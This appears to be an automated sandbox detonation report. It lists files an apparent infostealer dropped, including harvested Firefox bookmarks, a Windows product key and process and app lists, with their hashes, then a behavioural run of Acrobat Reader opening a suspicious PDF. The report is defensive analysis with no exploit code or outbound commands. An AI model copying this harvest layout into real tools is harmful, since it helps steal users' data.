SHA512 4be81d52a28bf5e7be69dd1db51803288b5817e4e9c56efd1bb78767695f3753e1afa10d3bb29d0d4d684f27c707aa1d53f386d5c04c8b080ffd4d718a7b267e

memory/4664-1187-0x0000000007020000-0x00000000070B2000-memory.dmp

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Process.txt

MD5 78f78af907cebe8c34bc2b58820ccb8c
SHA1 0a1e64adcc9ccd1b59ab0fec3460fd888ddc8d28
SHA256 3aaa47224ec7e88b7c1c6b9ad9f69ef163b4a3bb432e2d9cad7a490b81f2d22f
SHA512 20cad89ca15bd38ca5d621850e914c784dec50c8fd4bc45ac739da6425d84146935d4f3d9d1649e58bc22dc7a91f98559b8492a2183873bc271dd83e90ae238d

memory/4664-1297-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4664-1296-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4664-1331-0x0000000006930000-0x00000000069AA000-memory.dmp

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

memory/4664-1404-0x0000000006BB0000-0x0000000006C62000-memory.dmp

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Windows.txt

MD5 d3181270194f2c60fb84019a64a67ec0
SHA1 e60cbb8316305efa9717d6c99702560621cd9901
SHA256 08a20a4a7d010e9670afd792ae04a642a7c4b66101bba3111d3f159a220a643d
SHA512 d08944250f7b4e7aaf54f43851596a57da056fa5da3f6c73103d186e7f944ff72cb3a308b76fb38b59376eeebe1838cc7634b3f6f1cdda64fe696dcc07b1f305

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

memory/4664-1406-0x0000000008120000-0x0000000008474000-memory.dmp

memory/4664-1408-0x0000000071B40000-0x00000000722F0000-memory.dmp

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\msgid.dat

MD5 83d0759b0e0bd95d8ec3af4b24d34892
SHA1 3ef09021405d57c5c6b6581432064ed6dd055120
SHA256 dc12668b00a4dd01fa9bdc70018d359e4733d3db9cb387bddeb95e44a3f6585c
SHA512 cf525f2798199adf0a67f68bfa36a206978bc26557616d7dc20d5e0c99a3cf422ca1e9db1724b1dcf31a1f1716e9dd273e3427bad04bf6db395f6575fdf6c783

memory/4664-1419-0x00000000072E0000-0x00000000072EA000-memory.dmp

memory/4664-1426-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4664-1433-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4664-1434-0x0000000005190000-0x00000000051A0000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

142s

Max time network

150s

Command Line

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Document.pdf"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2880 wrote to memory of 3948 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2880 wrote to memory of 3948 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2880 wrote to memory of 3948 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 2280 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3948 wrote to memory of 408 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Processes

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Document.pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62049B54191AA028E86743705555F846 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4D586AF83A5279C81D184BD7E1A33E34 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4D586AF83A5279C81D184BD7E1A33E34 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=03736972FF31BF8D4652A6A526315093 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context 